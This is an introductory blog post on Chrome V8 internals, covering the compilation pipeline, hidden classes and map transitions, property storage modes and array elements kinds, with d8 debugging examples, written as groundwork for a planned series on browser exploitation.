My interest in web browsers first sparked back in 2018 when my buddy Michael Weber introduced me to Offensive Browser Extension Development which really opened my eyes to the potential attack surface. Afterwards, I started to dig deeper into Chrome’s internals and started to become very interested in web browser exploitation. Because let’s be honest here, what kind of Red Team wouldn’t want a “one-click” or even a “no-click” web browser exploit?

When it comes to browsers in the world of security research, they are considered some of the most impressive targets to find vulnerabilities in. They’re also unfortunately some of the most complicated to look at, as the amount of prerequisite knowledge required to even begin researching browser internals makes it seem like an unattainable goal for many researchers.

In spite of that, I took the steps to dive in by taking maxpl0it’s amazing “Introduction to Hard Target Internals” training course, which I highly recommend you take! This course provided me with a lot of background information on the inner workings and internals of browsers such as Chrome and Firefox. Afterwards, I was off to the races reading everything I could from Chromium blogs to V8 dev posts.

Since my learning method is more of a “learn it, teach it, know it” style, I am releasing this “Chrome Browser Exploitation” blog post series to give you an introduction to browser internals and to explore Chrome browser exploitation on Windows in more depth, all while learning it myself.

Now you might be asking me, why Chrome and why Windows? Well, two reasons:

  1. Chrome has a market share of ~73%, making it the most widely used browser in the world.
  2. Windows has a market share of ~90%, making it also the most widely used OS in the world.

By learning to target the most widely used software in the world, we, as a Red Team, greatly improve our chances of finding bugs, writing exploits, and successfully using them in engagements.

WARNING Due to the massive complexity of browsers, JavaScript engines, and JIT compilers, these blog posts will be very, very heavy reads.

Currently, this will be a three (3) post blog series. But, depending on the complexity and amount of information covered, I might split up the material to multiple additional posts.

Do note - I am writing these blog posts as I learn along the way. So please bear with me as it might take some time for me to release follow-up posts to this series.

With that being said, if you notice that I made a mistake in my posts, or am misleading the reader, then please reach out to me! Also, any recommendations, constructive criticism, critical feedback, etc. is very much appreciated!

Overall, by the end of this blog post series we will cover everything we need to know to start researching and exploiting potential Chrome bugs. In the final post of this series, we will attempt to exploit CVE-2018-17463 which was a JIT Compiler Vulnerability in Chrome V8’s Optimizer (TurboFan) discovered by Samuel Gross.

So, without further ado - let’s jump into the deep end and into the complex world of browser exploitation!

In today’s blog post, we will cover the basic prerequisite concepts that we need to fully understand before we dig any deeper. The following topics will be discussed:

  • The Flow of JavaScript Engines
    • JavaScript Engine Compiler Pipeline
    • Stack & Register Machines
  • JavaScript and V8 Internals
    • Object Representation
    • HiddenClasses (Map)
    • Shape (Map) Transitions
    • Properties
    • Elements and Arrays
  • Viewing Chrome Objects In-Memory
    • Pointer Tagging
    • Pointer Compression

But, before we begin, make sure to compile V8 and d8 on Windows to follow along. You can read my “Building Chrome V8 on Windows” gist for detailed instructions on how to do so.

The Flow of JavaScript Engines

We start our journey into browser internals by first understanding what JavaScript engines are and how they work. JavaScript engines are an integral part of executing JavaScript code on a system. Previously, they were mere interpreters, but today, modern JavaScript engines are complex programs that include a multitude of performance-improving components such as optimizing compilers and Just-In-Time (JIT) compilation.

There are actually many different JS engines in use today, such as:

  • V8 - Google’s open source high-performance JavaScript and WebAssembly engine, used in Chrome.
  • SpiderMonkey - Mozilla’s JavaScript and WebAssembly Engine, used in Firefox.
  • Chakra - A proprietary JScript engine developed by Microsoft for use in IE and Edge.
  • JavaScriptCore - Apple’s built-in JavaScript engine for WebKit use in Safari.

So why do we need these JavaScript engines, and all their complexities?

Well as we know, JavaScript is a lightweight, interpreted, object-oriented scripting language. In interpreted languages, the code is run line-by-line and the result of running the code is immediately returned, so we don’t have to compile the code into a different form before the browser runs it. On its own, this usually makes such languages slow. This is where compilation such as Just-In-Time compilation comes in: JavaScript code is parsed into bytecode (which is an abstraction of machine code) and is then further optimized by the JIT to make the code much more efficient and, in a sense, “fast”.

Now, while each of the above-mentioned JavaScript engines can have different compilers and optimizers, all of them are pretty much designed and implemented the same way based on the ECMAScript standard (a term often used interchangeably with JavaScript). The ECMAScript specification details how JavaScript should be implemented by the browser so that a JavaScript program will run exactly the same way in all browsers.

So, what really goes on after we execute JavaScript code? Well, to detail that, I have provided a diagram below that shows a high-level overview of the general “flow”, also known as the compilation pipeline, of JavaScript engines.

This might look confusing at first, but don’t worry - it really isn’t too hard to understand. So, let’s break down the “flow” step by step and explain what each of these components does.

  1. Parser: Once we execute JavaScript code, the code is passed into the JavaScript engine and we enter our first step, and that’s parsing the code. The parser converts the code into the following:
    • Tokens: The code is first broken down into “tokens”, such as Identifier, Number, String, Operator, etc. This is known as “Lexical Analysis” or “Tokenizing”.
      • Example: var num = 42 gets broken down to var,num,=,42 and each “token” or item is then tagged with its type, so in this case it would be Keyword,Identifier,Operator,Number.
    • Abstract Syntax Tree (AST): Once the code has been parsed into tokens, the parser will convert those tokens into an AST. This part is called “Syntax Analysis” and it does what it says, it checks to make sure there are no syntax errors in the code.
      • Example: Using the above code example, the AST for that will look like so:
        {
          "type": "VariableDeclaration",
          "start": 0,
          "end": 13,
          "declarations": [
            {
              "type": "VariableDeclarator",
              "start": 4,
              "end": 12,
              "id": {
                "type": "Identifier",
                "start": 4,
                "end": 7,
                "name": "num"
              },
              "init": {
                "type": "Literal",
                "start": 10,
                "end": 12,
                "value": 42,
                "raw": "42"
              }
            }
          ],
          "kind": "var"
        }
        
  2. Interpreter: Once an AST has been generated, it’s then passed into the Interpreter which walks the AST and generates bytecode. Once the bytecode has been generated, it is executed and the AST is deleted.
    • A list of Bytecodes for V8 can be found here.
    • An example of the bytecode for var num = 42; is shown below:
      LdaConstant [0]
      Star1
      Mov <closure>, r2
      CallRuntime [DeclareGlobals], r1-r2
      LdaSmi [42]
      StaGlobal [1], [0]
      LdaUndefined
      Return
      
  3. Compiler: The compiler works ahead of time by using something called a “Profiler” which monitors and watches code that should be optimized. If there is something known as a “hot function” the compiler takes that function and generates optimized machine code to execute. Otherwise, if it sees that a “hot function” that was optimized is no longer used, it will “deoptimize” it back to bytecode.
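
To make the tokenizing step from the Parser item above a bit more concrete, here is a minimal sketch of a lexer for that same var num = 42 example. Note that tokenize and KEYWORDS are hypothetical names made up for this illustration; V8's real scanner is written in C++ and handles far more token types than this toy does.

```javascript
// Hypothetical mini-lexer for illustration only; not how V8's scanner is implemented.
const KEYWORDS = new Set(["var", "let", "const", "function", "return"]);

function tokenize(source) {
  const tokens = [];
  // Sticky regex: skip whitespace, then match an identifier/keyword,
  // an integer, or a single operator/punctuator character.
  const pattern = /\s*([A-Za-z_$][\w$]*|\d+|[=+\-*\/;])/y;
  let match;
  // Stops at the end of input or at the first character it does not recognize.
  while (pattern.lastIndex < source.length && (match = pattern.exec(source)) !== null) {
    const text = match[1];
    let type;
    if (KEYWORDS.has(text)) type = "Keyword";
    else if (/^\d/.test(text)) type = "Number";
    else if (/^[A-Za-z_$]/.test(text)) type = "Identifier";
    else if (text === ";") type = "Punctuator";
    else type = "Operator";
    tokens.push({ type, value: text });
  }
  return tokens;
}

const tokens = tokenize("var num = 42");
console.log(tokens.map((t) => `${t.type}(${t.value})`).join(" "));
```

Each token is tagged with its type, which matches the Keyword,Identifier,Operator,Number sequence described above. A real parser would then consume this token stream to build the AST.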

When it comes to Google’s V8 JavaScript engine, the compilation pipeline is pretty similar. However, V8 includes an additional “non-optimizing” compiler which was added in 2021. Each component of V8 has a specific name, and they are as follows:

  • Ignition: V8’s fast low-level register-based interpreter that generates the bytecode.
  • Sparkplug: V8’s new non-optimizing JavaScript compiler that compiles from bytecode, by iterating the bytecode and emitting machine code for each bytecode as it is visited.
  • TurboFan: V8’s optimizing compiler that translates bytecode into machine code with more numerous and more sophisticated code optimizations. It also includes JIT (Just-In-Time) compilation.

Putting that all together, the V8 compilation pipeline from a high-level overview is as follows:

Now, don’t worry if some of these concepts or features like compilers and optimizations don’t make sense currently. It’s not necessary that we understand the whole compilation pipeline for today’s post, but we should have a general idea of how the engine works as a whole. We’ll cover the V8 pipeline and its components in more depth within the second post of this series.

Till then, if you want to learn more about the pipeline, I suggest watching “JavaScript Engines: The Good Parts” to get a better understanding.

The only thing you should understand from this compilation pipeline currently is that the Interpreter is a “stack machine”, or basically a VM (Virtual Machine), where bytecode is executed. In the case of Ignition (V8’s Interpreter), the interpreter is actually a “register machine” with an accumulator register. Ignition still uses a stack, but it prefers to store things in registers to speed things up.
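
If the difference between a stack machine and a register machine with an accumulator feels abstract, the following toy sketch might help. Both runStack and runRegister are hypothetical helpers written for this post. The opcode names LdaSmi, Star, and Add are borrowed from Ignition's bytecode, but their behavior here is heavily simplified and should not be read as V8's actual implementation.

```javascript
// Toy stack machine: operands are pushed and popped implicitly.
function runStack(program) {
  const stack = [];
  for (const [op, arg] of program) {
    if (op === "push") stack.push(arg);
    else if (op === "add") stack.push(stack.pop() + stack.pop());
    else throw new Error(`unknown op ${op}`);
  }
  return stack.pop();
}

// Toy register machine with an accumulator: operands are named explicitly.
function runRegister(program) {
  const regs = {};
  let acc;
  for (const [op, arg] of program) {
    if (op === "LdaSmi") acc = arg;                // load a small integer into the accumulator
    else if (op === "Star") regs[arg] = acc;       // store the accumulator into a register
    else if (op === "Add") acc = regs[arg] + acc;  // accumulator = register + accumulator
    else throw new Error(`unknown op ${op}`);
  }
  return acc;
}

// Both programs compute 1 + 2.
const stackResult = runStack([["push", 1], ["push", 2], ["add"]]);
const registerResult = runRegister([["LdaSmi", 1], ["Star", "r0"], ["LdaSmi", 2], ["Add", "r0"]]);
console.log(stackResult, registerResult);
```

The register version needs one more instruction here, but every intermediate value lives in a named slot (r0 or the accumulator) instead of being shuffled on and off a stack.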

I suggest you read “Understanding V8’s Bytecode” and “Firing up the Ignition Interpreter” to get a better grasp of these concepts.

JavaScript and V8 Internals

Now that we have some basic knowledge of how a JavaScript engine and its compiler pipeline are structured, it’s time we dig a little deeper into the internals of JavaScript itself and see how V8 stores and represents JavaScript objects in memory, along with their values and properties.

This section is single-handedly one of the most important pieces that you need to understand if you want to exploit bugs in V8, and other JavaScript engines as well. Because, as it turns out, all major engines implement the JavaScript object model in a similar fashion.

As we know, JavaScript is a dynamically typed language, meaning that type information is associated with runtime values rather than compile-time variables like in C++. This means that any object within JavaScript can have its properties easily modified during runtime. The JavaScript type system defines data types such as Undefined, Null, Boolean, String, Symbol, Number, and Object (including arrays and functions).

In simple terms, what does this mean? Well, it generally means that a variable in JavaScript, such as one declared with var, can hold values of different data types throughout its lifetime, unlike in C++. For example, let’s set a new variable called item in JavaScript and set it to 42.

var item = 42;

By using the typeof operator on the item variable, we can see that it returns its data type - which will be Number.

typeof item
'number'

Now what would happen if we try setting item to a string and then check its data type?

item = "Hello!";
typeof item
'string'

Look at that, the item variable now holds a String and not a Number. This is what makes JavaScript “dynamic” in nature. In C++, by contrast, if we tried creating an int (integer) variable and later tried setting it to a string, it would fail - like so:

int item = 3;
item = "Hello!"; // error: invalid conversion from 'const char*' to 'int'
//     ^~~~~~~~

While this is cool in JavaScript, it does pose a problem for us. V8 and Ignition are written in C++ so the Interpreter and Compiler need to figure out how JavaScript is intending to use some of the data. This is critical for efficient code compilation especially because in C++ there are differences in memory sizes for data types such as int or char.

Aside from efficiency, this also is critical to security since if the Interpreter and Compiler “interpret” the JavaScript code wrong and we get a dictionary object instead of an array object, we now have a Type Confusion vulnerability.

So how does V8 store all of this information with every runtime value, and how does the engine stay efficient?

Well, in V8, this is accomplished through the use of a dedicated information type object called a Map (not to be confused with Map Objects) which is otherwise known as a “Hidden Class”. At times you might hear a Map be referred to as a “Shape”, especially in Mozilla’s SpiderMonkey JavaScript engine. V8 also uses techniques called pointer tagging and pointer compression in memory (which we will discuss later in this post), which reduce memory consumption and allow V8 to represent any value in memory as a pointer to an object.

But, before we get too deep into the weeds of how all of those function, we first have to understand what JavaScript objects are and how they are represented within V8.

Object Representation

In JavaScript, Objects are essentially a collection of properties which are stored as key, value pairs - essentially this means that objects behave like dictionaries. Objects can be Arrays, Functions, Booleans, RegExp, etc.

Each object in JavaScript has properties associated with it, which can simply be explained as a variable that helps define the characteristics of the object. For example, a newly created car object can have properties such as make, model, and year that help define what the car object is. You can access the properties of an object either through a simple dot-notation operator such as objectName.propertyName or through bracket notation such as objectName['propertyName'].
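
As a quick illustration of the two access styles, here is a small sketch using the car object from the paragraph above. The property values are made up for the example.

```javascript
// Example object; the values are illustrative only.
const car = { make: "Ford", model: "Mustang", year: 1969 };

const viaDot = car.make;     // dot notation
const key = "model";
const viaBracket = car[key]; // bracket notation, useful when the key is computed at runtime

car.color = "red";           // properties can be added on the fly...
delete car.year;             // ...and removed again

console.log(viaDot, viaBracket, Object.keys(car));
```

Bracket notation is the only option when the property name is not a valid identifier or is only known at runtime.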

Additionally, each object property maps to property attributes, which are used to define and explain the state of the object’s properties. An example of what these property attributes look like within a JavaScript object can be seen below.

Now that we understand a little bit about what an object is, the next step is to understand how that object is structured in memory and where it’s stored.
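
Property attributes can also be inspected from JavaScript itself by using the standard Object.getOwnPropertyDescriptor and Object.defineProperty functions. The snippet below is only a small sketch; the point object and its properties are made up for illustration.

```javascript
const point = { x: 1 };

// A property created by plain assignment is writable, enumerable, and configurable.
const attrs = Object.getOwnPropertyDescriptor(point, "x");
console.log(attrs);

// Attributes can be set explicitly when defining a property.
Object.defineProperty(point, "id", {
  value: 7,
  writable: false,     // the value cannot be changed
  enumerable: false,   // hidden from Object.keys and for...in
  configurable: false, // cannot be deleted or redefined
});

const wasWritten = Reflect.set(point, "id", 99); // returns false instead of throwing
console.log(wasWritten, point.id, Object.keys(point));
```

Here Reflect.set is used instead of a plain assignment so that the failed write is reported as a boolean regardless of whether the code runs in strict mode.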

Whenever an object is created, V8 creates a new JSObject and allocates memory for it on the heap. The value of the object is a pointer to the JSObject which contains the following within its structure:

  • Map: A pointer to the HiddenClass object that details the “shape” or structure of the object.
  • Properties: A pointer to an object containing named properties.
  • Elements: A pointer to an object containing numbered properties.
  • In-Object Properties: Pointers to named properties that were defined at object initialization.

To help you in visualizing that, the image below details how a basic V8 JSObject is structured in memory.

Looking into the JSObject structure we can see that the Properties and Elements are stored in two separate FixedArray data structures which makes adding and accessing properties or elements more efficient. The elements structure predominantly stores properties whose keys are non-negative integers (array indices), which are commonly known as elements. As for the properties structure, if the property key of an object is not a non-negative integer, like a string, the property will be stored either as an In-Object Property (explained later in the post) or within the properties structure, also sometimes referred to as an object’s properties backing store.

One thing we must note is that while named properties are stored in a similar way as elements of an array, they are not the same when it comes to property access. Unlike elements, we cannot simply use the key to find the named property’s position within the properties array; we need some additional metadata. As mentioned before, V8 utilizes a special object called a HiddenClass or Map that’s associated to each JSObject. This Map stores all the information on JavaScript objects which in turn allows V8 to be “dynamic”.
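
The split between elements and named properties is an engine-internal detail, but a hint of it is observable from plain JavaScript. The sketch below only demonstrates behavior defined by the language specification (integer-like keys are enumerated first, in ascending order); it does not inspect V8's backing stores directly, and the object and key names are made up.

```javascript
const obj = {};
obj.b = "named";
obj[2] = "element";
obj.a = "named";
obj[0] = "element";

// Integer-like keys come first in ascending order,
// followed by string keys in insertion order.
const order = Object.keys(obj);
console.log(order);

// Arrays can carry named properties too, without affecting their length.
const arr = ["x"];
arr.label = "named";
console.log(arr.length, Object.keys(arr));
```

The integer keys are treated differently from the string keys even at the language level, which is consistent with an engine keeping them in a separate structure.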

So, before we go any further into understanding the JSObject structure and its properties, we first need to look at and understand how this HiddenClass works in V8.

HiddenClass (Map) and Shape Transitions

As discussed previously, we know that JavaScript is a dynamically typed language. In particular, because of this, JavaScript has no concept of classes with a fixed layout. In C++, once you define a class, you cannot add or delete methods and properties from its instances on the fly, unlike in JavaScript. In C++ and other statically typed object-oriented languages, you can store object properties at fixed memory offsets because the object layout for an instance of a given class will never change, but in JavaScript it can change dynamically at runtime. To combat this, JavaScript uses something called "prototype-based inheritance", where each object has a reference to a prototype object or "shape" whose properties it incorporates.

So how does V8 store an object's layout?

This is where the HiddenClass or Map comes into play. Hidden classes work similarly to a fixed object layout where the values of properties (or pointers to those properties) can be stored in a specific memory structure and then accessed with a fixed offset between each one. These offsets are generated by Torque and can be found within the /torque-generated/src/objects/*.tq.inc files in V8. The hidden class pretty much serves as an identifier for the "shape" of an object, which in turn allows V8 to better optimize the JavaScript code and improve property access time.

As previously seen in the JSObject example above, the Map is another data structure within the object. That Map structure contains the following information:

  • The dynamic type of the object, such as String, JSArray, HeapNumber, etc.
  • Size of the object (in-object properties, etc.)
  • Object properties and where they are stored
  • Type of array elements
  • Prototype or Shape of the object (if any)

To help visualize what the Map object looks like in memory, I have provided a rather detailed V8 Map structure in the image below. More information on the structures can be found within V8's source code, in the /src/objects/map.h and /src/objects/descriptor-array.h source files.

Now that we understand what the layout of the Map looks like, let's explain this "shape" that we constantly talk about. As you know, every newly created JSObject will have a hidden class of its own, which contains the memory offset for each of its properties. Here's the interesting part: if at any time a property of that object is created, deleted, or changed dynamically, then a new hidden class will be created. This new hidden class keeps the information of the existing properties and adds the memory offset of the new property. Do note that a new hidden class is only created when a new named property is added; adding an array-indexed property does not create a new hidden class.

So what does this look like in practice? Well, let's take the following code for example:

var obj1 = {};
obj1.x = 1;
obj1.y = 2;

At the start we create a new object called obj1, which is created and stored within V8's heap. Since this is a newly created object, we need to create a HiddenClass (obviously), even though no properties have been defined for this object yet. This HiddenClass is also created and stored within V8's heap. For our example purposes, we'll call this initial hidden class "C0".

Once the next line of the code is reached and obj1.x = 1 is executed, V8 will create a second hidden class called "C1" that is based off of C0. C1 will be the first HiddenClass to describe the location where property x can be found in memory. But instead of storing the pointer to the value for x, it will actually store the offset for x, which will be offset 0.

Okay, I know that at this point some of you might ask, "why an offset to the property and not to its value?"

Well, in V8 this is an optimization trick. Maps are relatively expensive objects in terms of memory usage. If we stored the key-value pairs of properties in a dictionary format within every newly created JSObject, that would cause a lot of computational overhead, as dictionary lookups are slow. Second of all, what happens if a new object, such as obj2, is created which shares the same properties as obj1, such as x and y? Even though the values might be different, the two objects actually share the same named properties in the same order, or as we would call it, the same "shape". In that case it would be wasteful for us to store the same property name in two different locations.

This is what allows V8 to be fast: it's optimized so that a Map is shared as much as possible between similarly shaped objects. Since the property names are repeated for all objects within the same shape and because they're in the same order, we can have multiple objects point to one single HiddenClass in memory with the offset to the properties instead of pointers to values. This also allows for easier garbage collection since Maps are allocations of a HeapObject just like the JSObject is.

To better explain this concept, let's sidetrack for a moment from our example above and look at the important parts of the HiddenClass. The two most important parts of the HiddenClass that give the Map its "shape" are the DescriptorArray and the third bit field. If you look back into the Map structure above, you'll notice that the third bit field stores the number of properties, and the descriptor array contains information about the named properties, such as the name itself, the position where the value is stored (offset), and the property's attributes.

For example, let's say we create a new object such as var obj = {x: 1}. The x property is going to be stored within the In-Object properties or Properties store of the JavaScript object. Since a new object is created, a new HiddenClass will also be created. Within that HiddenClass the descriptor array and the third bit field will be populated. The third bit field will set the numberOfOwnDescriptors to 1, since we only have one property, and then the descriptor array will populate the key, details, and value portions of the array with details relating to property x. The value for that descriptor will be set to 0. Why 0? Well, the In-Object properties and the Properties store are just an array. So, by setting the value of the descriptor to 0, V8 knows that the key's value will be at offset 0 of that array for any object of the same shape.

A visual example of what we just explained can be seen below.
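The descriptor lookup can also be sketched in plain JavaScript. This is a toy model only: the names shapeXY, storage, and getProperty are hypothetical and do not mirror V8's real classes or field layout.

```javascript
// Toy model only: a "shape" holds the descriptor array, which maps each
// property name to an offset into the object's value storage.
const shapeXY = {
  numberOfOwnDescriptors: 2,
  descriptors: [
    { key: 'x', offset: 0 },
    { key: 'y', offset: 1 },
  ],
};

// Objects of the same shape store only their values plus a pointer to the
// shared shape. The property names live in one place.
const obj1 = { map: shapeXY, storage: [1, 2] };
const obj2 = { map: shapeXY, storage: [2, 3] };

// Property access: find the key in the shape, then index the storage by offset.
function getProperty(obj, key) {
  const descriptor = obj.map.descriptors.find((d) => d.key === key);
  return descriptor === undefined ? undefined : obj.storage[descriptor.offset];
}

console.log(getProperty(obj1, 'x'), getProperty(obj2, 'y')); // 1 3
console.log(obj1.map === obj2.map); // true
```

Because the offsets live in the shared shape, a second object with the same properties costs only its own values.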

Let's see what this looks like within V8. To start, let's launch d8 with the --allow-natives-syntax parameter, and execute the following JavaScript code:

d8> var obj1 = {a: 1, b: 2, c: 3}

Once completed, we'll utilize the %DebugPrint() command against our object to display its properties, map, and other information such as the instance descriptor. Once executed, notice the following:

In Yellow we can see our object obj1. In Red we have the pointer to our HiddenClass or Map. Within that HiddenClass we have the instance descriptor which points to the DescriptorArray. Using the %DebugPrintPtr() function against the pointer to that array we can see more details on what that array looks like in memory, which is highlighted in Blue.

Take note, we have three properties, which matches the number of descriptors in the instance descriptors section of the map. Below that, we can see that the descriptor array holds our property keys, and the const data field holds the offsets to their associated values within the property store. Now, if we follow the arrow back up from the offsets to our object, we will notice that the offsets do match, and each property has its correct value assigned.

Also, take note on the right side of those properties you can see the location for each of those properties; which are in-object as I previously mentioned. This pretty much proves to us that the offsets are to the properties within the In-Object and Properties store.

Alright, now that we understand why we are using offsets, let's go back to our HiddenClass example from before. As we said before, by adding property x to obj1, we will now have a newly created HiddenClass called "C1" with the offset to x. Since we are creating a new HiddenClass, V8 will update C0 with a "class transition" which states that if a new object is created with the property of x, then the hidden class should switch directly to C1.

The process is then repeated when we execute obj1.y = 2. A new hidden class called C2 will be created, and a class transition is added to C1 stating that for any object with property x, if property y is added, then the hidden class should transition to C2. In the end, all of these class transitions create something known as a "transition tree".

Adding on, one must note that class transitions are dependent on the order in which properties are added to an object. So, if z were added after x instead of y, the object would no longer have the same "shape" and would not follow the transition path from C1 to C2. Instead, a new hidden class would be created and a new transition path would be added from C1 to account for that new property, further expanding the transition tree.

Now that we understand this, let's take a look at what objects look like in memory when a Map is shared between two objects of the same shape.
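To make the transition tree more concrete, here is a small toy model in JavaScript. ToyMap and its fields are hypothetical names chosen for this sketch. It only imitates the behaviour described above and is not how V8 implements Maps.

```javascript
// Toy model only: ToyMap is a hypothetical stand-in for a hidden class.
class ToyMap {
  constructor(backPointer = null, key = null) {
    this.backPointer = backPointer; // parent map in the transition tree
    this.transitions = new Map();   // property name -> child ToyMap
    // Inherit the parent's descriptors and append the new key at the next offset.
    this.descriptors = backPointer ? [...backPointer.descriptors] : [];
    if (key !== null) {
      this.descriptors.push({ key, offset: this.descriptors.length });
    }
  }

  // Follow an existing transition for `key`, or create one if none exists yet.
  transition(key) {
    if (!this.transitions.has(key)) {
      this.transitions.set(key, new ToyMap(this, key));
    }
    return this.transitions.get(key);
  }
}

const C0 = new ToyMap();       // shape of {}
const C1 = C0.transition('x'); // shape after adding x
const C2 = C1.transition('y'); // shape after adding x, then y

// A second object that adds x and then y walks the same path and reuses C2.
const sameShape = C0.transition('x').transition('y');
// Adding the properties in the opposite order branches the tree instead.
const otherShape = C0.transition('y').transition('x');

console.log(sameShape === C2);      // true
console.log(otherShape === C2);     // false
console.log(C2.backPointer === C1); // true
```

Keeping the transitions on the parent map is what lets a later object with the same property order land on an existing map instead of allocating a new one.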

To start, launch d8 again with the --allow-natives-syntax parameter, and then enter the following two lines of JavaScript code:

d8> var obj1 = {x: 1, y: 2};
d8> var obj2 = {x: 2, y: 3};

Once completed, we'll again utilize the %DebugPrint() command against each of our objects to display their properties, map, and other information. Once executed, notice the following:

In Yellow we can see both of our objects, obj1 and obj2. Take note that each is a JS_OBJECT_TYPE with a different memory address in the heap, because obviously they're separate objects with potentially different properties.

As we know, both of these objects share the same shape, since they both contain x and y in the same order. In that case, in Blue, we can see that the properties are in the same FixedArray with the offset for x and y being 0 and 1 respectively. The reason for this is that, as we already know, same-shaped objects share a HiddenClass (represented in Red) that will have the same descriptor array.

As you can see, most of the object's properties and the Map addresses will be the same, all because both of these objects are sharing that single Map.

Now let's focus on the back_pointer that's highlighted in Green. If you look back into our C0 to C2 Map transition example, you'll notice that we mentioned something called a "transition tree". This transition tree is created in the background by V8 each time a new HiddenClass is created and allows V8 to link the new and old HiddenClasses together. This back_pointer is part of that transition tree, as it points back to the parent map from which the transition occurred. This allows V8 to walk the back pointer chain until it finds the map holding an object's properties, i.e. their shape.

Let's use d8 to take a deeper look into how that works. We'll use the %DebugPrintPtr() command again to print the details of an address pointer in V8. In this case we will take the back_pointer address to view its details. Once done, your output should be similar to mine.

In Green we can see that the back_pointer resolves to a JS_OBJECT_TYPE in memory, which in fact turns out to be a Map! This map is the C1 map that we talked about previously. We know how a Map can backtrack to its previous Map, but how does it know what Map to transition to when a property is added? Well, if we pay close attention to the information within that Map, we'll notice that below the instance descriptor pointer there is a "transitions" section in Red. This transition section contains the information pointed to by the Raw Transition Pointer within the Map structure.

In V8, Map transitions use something called a TransitionsAccessor. This is a helper class that encapsulates access to the various ways a Map can store transitions to other maps in its respective field at Map::kTransitionsOrPrototypeInfo, otherwise known as the Raw Transition Pointer that we mentioned earlier. This pointer points to something known as a TransitionArray, which again is a FixedArray that holds map transitions for property changes.

Looking back into the Red highlighted section, we can see that there is only one transition in that transition array. Within that array we can see that transition #1 details a transition for when the y property is added to the object. If y is added, it tells the map to update itself with the map stored in 0x007f00259735, which matches our current map! In the case that there was another transition, for example if z was added to x instead of y, then we would have two items within that transition array, each pointing to its respective map for that object's shape.

NOTE: If you would like to play around with Maps and have another visual representation of Map transitions, I recommend utilizing V8's Indicium tool. The tool is a unified web interface that allows one to trace, debug and analyze patterns of how Maps are created and modified in real-world applications.

Now, what would happen to the transition tree if we deleted a property? Well, in this case there is a nuance to V8 creating a new map each time a property deletion occurs. As we know, maps are relatively expensive when it comes to memory usage, so at a certain point the cost of inheriting and maintaining a transition tree will get larger and slower. In the case that the last property of an object is deleted, V8 will just follow the back pointer and move the object back to its previous map, instead of creating a new one. But what happens if we delete the middle property of an object? Well, in that case V8 will give up on maintaining the transition tree, as it does whenever we add too many properties or delete anything other than the last property, and it'll switch to a slower mode known as dictionary mode.

So, what is this dictionary mode? Well, now that we know how V8 uses HiddenClasses to track the shape of objects, we can now go back full circle and dive into further understanding how these Properties and Elements are actually stored and handled in V8.

Properties

As explained previously, we know that JavaScript objects have two fundamental kinds of properties: named properties and indexed elements. We'll start by covering named properties.

If you recall back to our discussion on Maps and the Descriptor Array, we mentioned named properties being stored either In-Object or within the Property array. What is this In-Object Property that we are talking about?

Well, in V8 this mode is a very fast method of storing properties directly on the object since they are accessible without any indirection. Although they are very fast, they are also limited to the initial size of the object. If more properties get added than there is space in the object, then the new properties are stored within the properties store - which adds one level of indirection.

In general, there are two "modes" that JavaScript engines use to store properties, and those are called:

  • Fast Properties: Typically used to define the properties stored in the linear properties store. These properties are simply accessed by index in the properties store by consulting the Descriptor Array within the HiddenClass.
  • Slow Properties: Also known as "dictionary mode", this mode is utilized when there are too many properties being added or deleted - resulting in a lot of memory overhead. As a result, an object with slow properties will have a self-contained dictionary as a properties store. All the property meta information is no longer stored in the Descriptor Array in the HiddenClass but directly in the properties dictionary. V8 will then use a hash table to access these properties.

An example of what a Map would look like when it transitions to slow properties with the self-contained dictionary can be seen below.

One thing must be noted here as well. Shape transitions only work for fast properties and not slow properties, due to the fact that dictionary shapes are used by a single object only, so they can't be shared between different objects and therefore have no transitions.

Elements

Alright, at this point we have pretty much covered named properties. Now let's take a look at array-indexed properties or elements. One would think that the handling of indexed properties would be less complex... but you would be wrong to assume that. The handling of elements is no less complex than that of named properties. Even though all indexed properties are kept in the elements store, V8 makes a very precise distinction on what kind of elements each array contains. There are actually ~21 different kinds of elements that can be tracked within that store! This allows V8 to optimize any operations on the array specifically for that type of element.

What do I mean by that? Well, let's take this line of code for example:

const array = [1,2,3];

In JavaScript, if we run the typeof operator against the elements of this array, it would say that each one is a number, because JavaScript does not distinguish between an integer, float, or double. However, V8 makes much more precise distinctions and will classify this array as PACKED_SMI_ELEMENTS, with SMI referring to Small Integers.

So, what's with the SMI? Well, V8 keeps track of what kind of elements each array contains. It then uses this information to optimize array operations for this type of element. Within V8 there are three distinct element types that we need to know about, and they are:
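As a quick check of what the language itself reports, the snippet below uses only the standard typeof operator and Array.isArray(). The variable names are arbitrary.

```javascript
const array = [1, 2, 3];

// The array itself is reported as a generic object.
const arrayType = typeof array;          // 'object'
const isArray = Array.isArray(array);    // true

// Integers and floating-point values are both just 'number' to JavaScript.
const integerType = typeof array[0];     // 'number'
const doubleType = typeof 4.5;           // 'number'

console.log(arrayType, isArray, integerType, doubleType);
```

None of this tells us anything about the elements kind. That distinction exists only inside V8.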

  • SMI_ELEMENTS - Used to represent an array that contains small integers, such as 1,2,3, etc.
  • DOUBLE_ELEMENTS - Used to represent an array that contains floating-point numbers, such as 4.5, 5.5, etc.
  • ELEMENTS - Used to represent an array that contains string literal elements or values that cannot be represented as an SMI or Double, such as 'x'.

So how does V8 use these element types for an array? Are they set for the array or for each element? The answer is that the element type is set for the array. The important thing we have to remember is that element kinds have a "transition" that only goes in one direction. We can view this transition tree from a "top down" approach as such.

For example, let's take our array example from before:

const array = [1,2,3];
// Elements Kind: PACKED_SMI_ELEMENTS

As you can see, V8 tracks this array's elements kind as a packed SMI (we'll detail what packed is in a moment). Now, if we were to add a floating-point number, then the array's elements kind would "transition" to the Double elements kind, as such.

const array = [1,2,3];
// Elements Kind: PACKED_SMI_ELEMENTS
array.push(3.337)
// Elements Kind: PACKED_DOUBLE_ELEMENTS

The reason for this transition is simple: operation optimizations. Because we have a floating-point number, V8 needs to be able to perform optimizations on those values, so it transitions down one step to PACKED_DOUBLE_ELEMENTS. This works because the set of numbers that can be represented as a SMI is a subset of the numbers that can be represented as a double.

Since elements kind transitions go one way, once an array is marked with a lower elements kind, such as PACKED_DOUBLE_ELEMENTS, it can no longer go back "up" to PACKED_SMI_ELEMENTS, even if we replace or remove that floating-point number. In general, the more specific an elements kind is when you create an array, the more fine-grained optimizations are enabled. The further down the elements kind you go, the slower manipulations of that object might be.

Next, we also need to understand the first major distinction that V8 makes when it tracks element backing stores: whether an index has been deleted or left empty. The two categories are:

  • PACKED - Used to represent arrays that are dense, meaning that all available elements in the array have been populated.
  • HOLEY - Used to represent arrays that have "holes" in them, such as when an indexed element is deleted, or not defined. This is also known as making an array "sparse".

